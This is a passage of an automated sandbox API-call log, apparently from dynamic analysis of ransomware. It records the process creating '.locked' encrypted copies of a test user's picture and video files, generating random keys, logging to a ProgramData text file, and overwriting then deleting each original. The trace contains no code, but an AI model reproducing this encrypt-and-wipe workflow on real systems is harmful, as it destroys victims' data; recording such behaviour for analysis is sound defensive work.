[0312.428] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0312.483] SetEvent (hEvent=0x14c) returned 1 [0312.483] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0312.488] SetEvent (hEvent=0x14c) returned 1 [0312.488] SetEvent (hEvent=0x214) returned 1 [0312.488] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0312.496] SetEvent (hEvent=0x14c) returned 1 [0312.496] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0312.539] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0312.542] SetEvent (hEvent=0x190) returned 1 [0312.542] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0313.396] SetEvent (hEvent=0x190) returned 1 [0313.396] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0315.360] SetEvent (hEvent=0x1f0) returned 1 [0315.360] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0315.870] SetEvent (hEvent=0x1e8) returned 1 [0315.870] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0315.891] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\eDM5D-EmY4\\EL7ncsIzIojJ _a9Ks\\tX9_ewqicQ_n-v\\IlUU10BeX.gif" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\edm5d-emy4\\el7ncsiziojj _a9ks\\tx9_ewqicq_n-v\\iluu10bex.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x200 [0315.891] GetConsoleMode (in: hConsoleHandle=0x200, lpMode=0x125e5d9c | out: lpMode=0x125e5d9c) returned 0 [0315.891] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\eDM5D-EmY4\\EL7ncsIzIojJ _a9Ks\\tX9_ewqicQ_n-v\\IlUU10BeX.gif.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\edm5d-emy4\\el7ncsiziojj _a9ks\\tx9_ewqicq_n-v\\iluu10bex.gif.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x218 [0315.954] GetConsoleMode (in: hConsoleHandle=0x218, lpMode=0x125e5d9c | out: lpMode=0x125e5d9c) returned 0 [0315.954] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x1234c200 | out: pbBuffer=0x1234c200) returned 1 [0315.955] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x12392040 | out: pbBuffer=0x12392040) returned 1 [0315.955] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x1237c081 | out: pbBuffer=0x1237c081) returned 1 [0315.955] WriteFile (in: hFile=0x218, lpBuffer=0x125ea000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x125e5d78, lpOverlapped=0x0 | out: lpBuffer=0x125ea000*, lpNumberOfBytesWritten=0x125e5d78*=0x80, lpOverlapped=0x0) returned 1 [0315.958] ReadFile (in: hFile=0x200, lpBuffer=0x13f2a000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x125e5d68, lpOverlapped=0x0 | out: lpBuffer=0x13f2a000*, lpNumberOfBytesRead=0x125e5d68*=0x16fc, lpOverlapped=0x0) returned 1 [0315.960] WriteFile (in: hFile=0x218, lpBuffer=0x13f2a000*, nNumberOfBytesToWrite=0x16fc, lpNumberOfBytesWritten=0x125e5d74, lpOverlapped=0x0 | out: lpBuffer=0x13f2a000*, lpNumberOfBytesWritten=0x125e5d74*=0x16fc, lpOverlapped=0x0) returned 1 [0315.996] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0316.031] SetEvent (hEvent=0x20c) returned 1 [0316.031] ReadFile (in: hFile=0x200, lpBuffer=0x13f2a000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x125e5d68, lpOverlapped=0x0 | out: lpBuffer=0x13f2a000*, lpNumberOfBytesRead=0x125e5d68*=0x0, lpOverlapped=0x0) returned 1 [0316.031] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0316.115] CloseHandle (hObject=0x218) returned 1 [0316.116] CloseHandle (hObject=0x200) returned 1 [0316.116] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x200 [0316.116] GetConsoleMode (in: hConsoleHandle=0x200, lpMode=0x125e5e94 | out: lpMode=0x125e5e94) returned 0 [0316.116] WriteFile (in: hFile=0x200, lpBuffer=0x125ee0c0*, nNumberOfBytesToWrite=0x5f, lpNumberOfBytesWritten=0x125e5e64, lpOverlapped=0x0 | out: lpBuffer=0x125ee0c0*, lpNumberOfBytesWritten=0x125e5e64*=0x5f, lpOverlapped=0x0) returned 1 [0316.116] CloseHandle (hObject=0x200) returned 1 [0316.116] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\eDM5D-EmY4\\EL7ncsIzIojJ _a9Ks\\tX9_ewqicQ_n-v\\IlUU10BeX.gif" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\edm5d-emy4\\el7ncsiziojj _a9ks\\tx9_ewqicq_n-v\\iluu10bex.gif")) returned 1 [0316.255] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0316.505] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\eDM5D-EmY4\\EL7ncsIzIojJ _a9Ks\\tX9_ewqicQ_n-v\\IlUU10BeX.gif" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\edm5d-emy4\\el7ncsiziojj _a9ks\\tx9_ewqicq_n-v\\iluu10bex.gif"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x218 [0316.567] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0316.654] GetConsoleMode (in: hConsoleHandle=0x218, lpMode=0x125e5e88 | out: lpMode=0x125e5e88) returned 0 [0316.654] WriteFile (in: hFile=0x218, lpBuffer=0x156f4000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x125e5e78, lpOverlapped=0x0 | out: lpBuffer=0x156f4000*, lpNumberOfBytesWritten=0x125e5e78*=0xfa000, lpOverlapped=0x0) returned 1 [0316.692] CloseHandle (hObject=0x218) returned 1 [0316.692] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\eDM5D-EmY4\\EL7ncsIzIojJ _a9Ks\\tX9_ewqicQ_n-v\\IlUU10BeX.gif" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\edm5d-emy4\\el7ncsiziojj _a9ks\\tx9_ewqicq_n-v\\iluu10bex.gif")) returned 1 [0316.792] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x1) returned 0x102 [0316.808] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0316.808] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x1) returned 0x0 [0316.815] SetEvent (hEvent=0x1e8) returned 1 [0316.815] SetEvent (hEvent=0x220) returned 1 [0316.815] SetEvent (hEvent=0x214) returned 1 [0316.815] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0316.819] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x331efb34, ulCount=0x10, ulNumEntriesRemoved=0x331efb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x331efb34, ulNumEntriesRemoved=0x331efb14) returned 0 [0316.819] SetEvent (hEvent=0x150) returned 1 [0316.819] SetEvent (hEvent=0x214) returned 1 [0316.819] SetEvent (hEvent=0x220) returned 1 [0316.819] WriteFile (in: hFile=0x224, lpBuffer=0x15a10000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x125d9e78, lpOverlapped=0x0 | out: lpBuffer=0x15a10000*, lpNumberOfBytesWritten=0x125d9e78*=0xfa000, lpOverlapped=0x0) returned 1 [0316.893] CloseHandle (hObject=0x224) returned 1 [0316.920] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0316.981] SetEvent (hEvent=0x214) returned 1 [0316.981] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0316.982] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0317.046] SetEvent (hEvent=0x190) returned 1 [0317.047] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Videos\\MbZcvQXWXnb3nn6YXYz.mkv" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\mbzcvqxwxnb3nn6yxyz.mkv"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e0 [0317.048] GetConsoleMode (in: hConsoleHandle=0x1e0, lpMode=0x1248dd9c | out: lpMode=0x1248dd9c) returned 0 [0317.048] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Videos\\MbZcvQXWXnb3nn6YXYz.mkv.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\mbzcvqxwxnb3nn6yxyz.mkv.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x208 [0317.048] GetConsoleMode (in: hConsoleHandle=0x208, lpMode=0x1248dd9c | out: lpMode=0x1248dd9c) returned 0 [0317.049] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x1263e0c0 | out: pbBuffer=0x1263e0c0) returned 1 [0317.049] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x124a80b0 | out: pbBuffer=0x124a80b0) returned 1 [0317.049] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12714381 | out: pbBuffer=0x12714381) returned 1 [0317.049] WriteFile (in: hFile=0x208, lpBuffer=0x126f5000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1248dd78, lpOverlapped=0x0 | out: lpBuffer=0x126f5000*, lpNumberOfBytesWritten=0x1248dd78*=0x80, lpOverlapped=0x0) returned 1 [0317.050] SetEvent (hEvent=0x214) returned 1 [0317.050] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0317.076] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0317.132] SetEvent (hEvent=0x20c) returned 1 [0317.132] SetEvent (hEvent=0x1f0) returned 1 [0317.132] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0317.185] SetEvent (hEvent=0x22c) returned 1 [0317.185] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0317.324] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x1) returned 0x0 [0317.330] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x331efb30, ulCount=0x10, ulNumEntriesRemoved=0x331efb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x331efb30, ulNumEntriesRemoved=0x331efb10) returned 0 [0317.330] SetEvent (hEvent=0x150) returned 1 [0317.330] SetEvent (hEvent=0x12c) returned 1 [0317.330] ReadFile (in: hFile=0x1bc, lpBuffer=0x13e14000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x125e3d68, lpOverlapped=0x0 | out: lpBuffer=0x13e14000*, lpNumberOfBytesRead=0x125e3d68*=0x6ae8, lpOverlapped=0x0) returned 1 [0317.332] WriteFile (in: hFile=0x1f4, lpBuffer=0x13e14000*, nNumberOfBytesToWrite=0x6ae8, lpNumberOfBytesWritten=0x125e3d74, lpOverlapped=0x0 | out: lpBuffer=0x13e14000*, lpNumberOfBytesWritten=0x125e3d74*=0x6ae8, lpOverlapped=0x0) returned 1 [0317.333] ReadFile (in: hFile=0x1bc, lpBuffer=0x13e14000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x125e3d68, lpOverlapped=0x0 | out: lpBuffer=0x13e14000*, lpNumberOfBytesRead=0x125e3d68*=0x0, lpOverlapped=0x0) returned 1 [0317.334] CloseHandle (hObject=0x1f4) returned 1 [0317.388] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0317.553] CloseHandle (hObject=0x1bc) returned 1 [0317.554] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1bc [0317.554] GetConsoleMode (in: hConsoleHandle=0x1bc, lpMode=0x125e3e94 | out: lpMode=0x125e3e94) returned 0 [0317.554] WriteFile (in: hFile=0x1bc, lpBuffer=0x1234a200*, nNumberOfBytesToWrite=0x38, lpNumberOfBytesWritten=0x125e3e64, lpOverlapped=0x0 | out: lpBuffer=0x1234a200*, lpNumberOfBytesWritten=0x125e3e64*=0x38, lpOverlapped=0x0) returned 1 [0317.554] CloseHandle (hObject=0x1bc) returned 1 [0317.554] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Videos\\UNI9RnsVnTQHak 3L.mp4" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\uni9rnsvntqhak 3l.mp4")) returned 1 [0317.578] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0317.597] SetEvent (hEvent=0x214) returned 1 [0317.598] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0317.598] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0317.611] SetEvent (hEvent=0x214) returned 1 [0317.611] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0317.615] SetEvent (hEvent=0x12c) returned 1 [0317.615] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0317.835] SetEvent (hEvent=0x22c) returned 1 [0317.835] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0317.867] ReadFile (in: hFile=0x1e0, lpBuffer=0x1628e000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x1235fd68, lpOverlapped=0x0 | out: lpBuffer=0x1628e000*, lpNumberOfBytesRead=0x1235fd68*=0x42cb, lpOverlapped=0x0) returned 1 [0317.869] WriteFile (in: hFile=0x1c0, lpBuffer=0x1628e000*, nNumberOfBytesToWrite=0x42cb, lpNumberOfBytesWritten=0x1235fd74, lpOverlapped=0x0 | out: lpBuffer=0x1628e000*, lpNumberOfBytesWritten=0x1235fd74*=0x42cb, lpOverlapped=0x0) returned 1 [0317.881] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0317.993] ReadFile (in: hFile=0x1e0, lpBuffer=0x1628e000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x1235fd68, lpOverlapped=0x0 | out: lpBuffer=0x1628e000*, lpNumberOfBytesRead=0x1235fd68*=0x0, lpOverlapped=0x0) returned 1 [0317.993] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0318.253] CloseHandle (hObject=0x1c0) returned 1 [0318.503] CloseHandle (hObject=0x1e0) returned 1 [0318.503] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e0 [0318.503] GetConsoleMode (in: hConsoleHandle=0x1e0, lpMode=0x1235fe94 | out: lpMode=0x1235fe94) returned 0 [0318.503] WriteFile (in: hFile=0x1e0, lpBuffer=0x12380180*, nNumberOfBytesToWrite=0x37, lpNumberOfBytesWritten=0x1235fe64, lpOverlapped=0x0 | out: lpBuffer=0x12380180*, lpNumberOfBytesWritten=0x1235fe64*=0x37, lpOverlapped=0x0) returned 1 [0318.505] CloseHandle (hObject=0x1e0) returned 1 [0318.540] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0318.541] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Videos\\J3dNrQOdkj_GDvbJ.flv" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\j3dnrqodkj_gdvbj.flv")) returned 1 [0318.565] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x1) returned 0x0 [0318.566] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x331efb30, ulCount=0x10, ulNumEntriesRemoved=0x331efb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x331efb30, ulNumEntriesRemoved=0x331efb10) returned 0 [0318.566] SetEvent (hEvent=0x150) returned 1 [0318.566] SetEvent (hEvent=0x1dc) returned 1 [0318.566] SetEvent (hEvent=0x14c) returned 1 [0318.576] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Videos\\J3dNrQOdkj_GDvbJ.flv" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\j3dnrqodkj_gdvbj.flv"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e0 [0318.578] GetConsoleMode (in: hConsoleHandle=0x1e0, lpMode=0x1235fe88 | out: lpMode=0x1235fe88) returned 0 [0318.578] WriteFile (in: hFile=0x1e0, lpBuffer=0x13636000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x1235fe78, lpOverlapped=0x0 | out: lpBuffer=0x13636000*, lpNumberOfBytesWritten=0x1235fe78*=0xfa000, lpOverlapped=0x0) returned 1 [0318.591] CloseHandle (hObject=0x1e0) returned 1 [0318.591] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Videos\\J3dNrQOdkj_GDvbJ.flv" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\j3dnrqodkj_gdvbj.flv")) returned 1 [0318.600] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0318.622] SetEvent (hEvent=0x22c) returned 1 [0318.622] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0318.627] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0318.655] SetEvent (hEvent=0x184) returned 1 [0318.655] SetEvent (hEvent=0x1ac) returned 1 [0318.655] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0318.660] SetEvent (hEvent=0x184) returned 1 [0318.660] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0318.678] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0318.682] SetEvent (hEvent=0x180) returned 1 [0318.682] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x1) returned 0x102 [0318.690] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0318.690] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x1) returned 0x102 [0318.692] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0318.692] SetEvent (hEvent=0x198) returned 1 [0318.692] SetEvent (hEvent=0x104) returned 1 [0318.692] SetEvent (hEvent=0x180) returned 1 [0318.692] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0318.693] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x331efb34, ulCount=0x10, ulNumEntriesRemoved=0x331efb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x331efb34, ulNumEntriesRemoved=0x331efb14) returned 0 [0318.693] SetEvent (hEvent=0x104) returned 1 [0318.693] SetEvent (hEvent=0x180) returned 1 [0318.693] SetEvent (hEvent=0x198) returned 1 [0318.693] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Videos\\UQ6zmB-l2xOZ\\QEKwGgKsUelEh0NETYm.avi" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\uq6zmb-l2xoz\\qekwggksueleh0netym.avi")) returned 1 [0318.731] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x1) returned 0x0 [0318.733] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x331efb30, ulCount=0x10, ulNumEntriesRemoved=0x331efb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x331efb30, ulNumEntriesRemoved=0x331efb10) returned 0 [0318.733] SetEvent (hEvent=0x180) returned 1 [0318.733] SetEvent (hEvent=0x1ac) returned 1 [0318.734] SetEvent (hEvent=0x104) returned 1 [0318.734] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Videos\\UQ6zmB-l2xOZ\\QEKwGgKsUelEh0NETYm.avi" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\uq6zmb-l2xoz\\qekwggksueleh0netym.avi"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e0 [0318.737] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0318.809] SetEvent (hEvent=0x150) returned 1 [0318.809] SetEvent (hEvent=0x20c) returned 1 [0318.809] GetConsoleMode (in: hConsoleHandle=0x1e0, lpMode=0x1276fe88 | out: lpMode=0x1276fe88) returned 0 [0318.809] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0319.185] WriteFile (in: hFile=0x1e0, lpBuffer=0x14c0a000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x1276fe78, lpOverlapped=0x0 | out: lpBuffer=0x14c0a000*, lpNumberOfBytesWritten=0x1276fe78*=0xfa000, lpOverlapped=0x0) returned 1 [0319.231] CloseHandle (hObject=0x1e0) returned 1 [0319.247] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Videos\\UQ6zmB-l2xOZ\\QEKwGgKsUelEh0NETYm.avi" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\uq6zmb-l2xoz\\qekwggksueleh0netym.avi")) returned 1 [0319.735] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0319.875] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1263e000*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x125e5a24, lpReserved=0x0 | out: lpBuffer=0x1263e000*, lpNumberOfCharsWritten=0x125e5a24*=0xc) returned 1 [0319.877] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Videos\\eqS3SfB.swf" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\eqs3sfb.swf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b0 [0319.878] GetConsoleMode (in: hConsoleHandle=0x1b0, lpMode=0x125e5d9c | out: lpMode=0x125e5d9c) returned 0 [0319.878] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Videos\\eqS3SfB.swf.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\eqs3sfb.swf.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e0 [0320.164] GetConsoleMode (in: hConsoleHandle=0x1e0, lpMode=0x125e5d9c | out: lpMode=0x125e5d9c) returned 0 [0320.164] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x1263e020 | out: pbBuffer=0x1263e020) returned 1 [0320.164] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x124a8040 | out: pbBuffer=0x124a8040) returned 1 [0320.164] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12714001 | out: pbBuffer=0x12714001) returned 1 [0320.164] WriteFile (in: hFile=0x1e0, lpBuffer=0x12705000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x125e5d78, lpOverlapped=0x0 | out: lpBuffer=0x12705000*, lpNumberOfBytesWritten=0x125e5d78*=0x80, lpOverlapped=0x0) returned 1 [0320.167] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x331efb30, ulCount=0x10, ulNumEntriesRemoved=0x331efb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x331efb30, ulNumEntriesRemoved=0x331efb10) returned 0 [0320.167] SetEvent (hEvent=0x198) returned 1 [0320.167] ReadFile (in: hFile=0x1b0, lpBuffer=0x17e78000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x125e5d68, lpOverlapped=0x0 | out: lpBuffer=0x17e78000*, lpNumberOfBytesRead=0x125e5d68*=0x14cd3, lpOverlapped=0x0) returned 1 [0320.169] WriteFile (in: hFile=0x1e0, lpBuffer=0x17e78000*, nNumberOfBytesToWrite=0x14cd3, lpNumberOfBytesWritten=0x125e5d74, lpOverlapped=0x0 | out: lpBuffer=0x17e78000*, lpNumberOfBytesWritten=0x125e5d74*=0x14cd3, lpOverlapped=0x0) returned 1 [0320.203] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0320.208] SetEvent (hEvent=0x150) returned 1 [0320.208] ReadFile (in: hFile=0x1b0, lpBuffer=0x17e78000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x125e5d68, lpOverlapped=0x0 | out: lpBuffer=0x17e78000*, lpNumberOfBytesRead=0x125e5d68*=0x0, lpOverlapped=0x0) returned 1 [0320.208] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0320.213] CloseHandle (hObject=0x1e0) returned 1 [0320.213] CloseHandle (hObject=0x1b0) returned 1 [0320.213] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b0 [0320.214] GetConsoleMode (in: hConsoleHandle=0x1b0, lpMode=0x125e5e94 | out: lpMode=0x125e5e94) returned 0 [0320.214] WriteFile (in: hFile=0x1b0, lpBuffer=0x1263c090*, nNumberOfBytesToWrite=0x2e, lpNumberOfBytesWritten=0x125e5e64, lpOverlapped=0x0 | out: lpBuffer=0x1263c090*, lpNumberOfBytesWritten=0x125e5e64*=0x2e, lpOverlapped=0x0) returned 1 [0320.214] CloseHandle (hObject=0x1b0) returned 1 [0320.214] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Videos\\eqS3SfB.swf" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\eqs3sfb.swf")) returned 1 [0320.247] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Videos\\eqS3SfB.swf" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\eqs3sfb.swf"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b0 [0320.247] GetConsoleMode (in: hConsoleHandle=0x1b0, lpMode=0x125e5e88 | out: lpMode=0x125e5e88) returned 0 [0320.247] WriteFile (in: hFile=0x1b0, lpBuffer=0x1322a000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x125e5e78, lpOverlapped=0x0 | out: lpBuffer=0x1322a000*, lpNumberOfBytesWritten=0x125e5e78*=0xfa000, lpOverlapped=0x0) returned 1 [0320.313] CloseHandle (hObject=0x1b0) returned 1 [0320.314] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Videos\\eqS3SfB.swf" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\eqs3sfb.swf")) returned 1 [0320.318] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x125fc020*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x125e5a24, lpReserved=0x0 | out: lpBuffer=0x125fc020*, 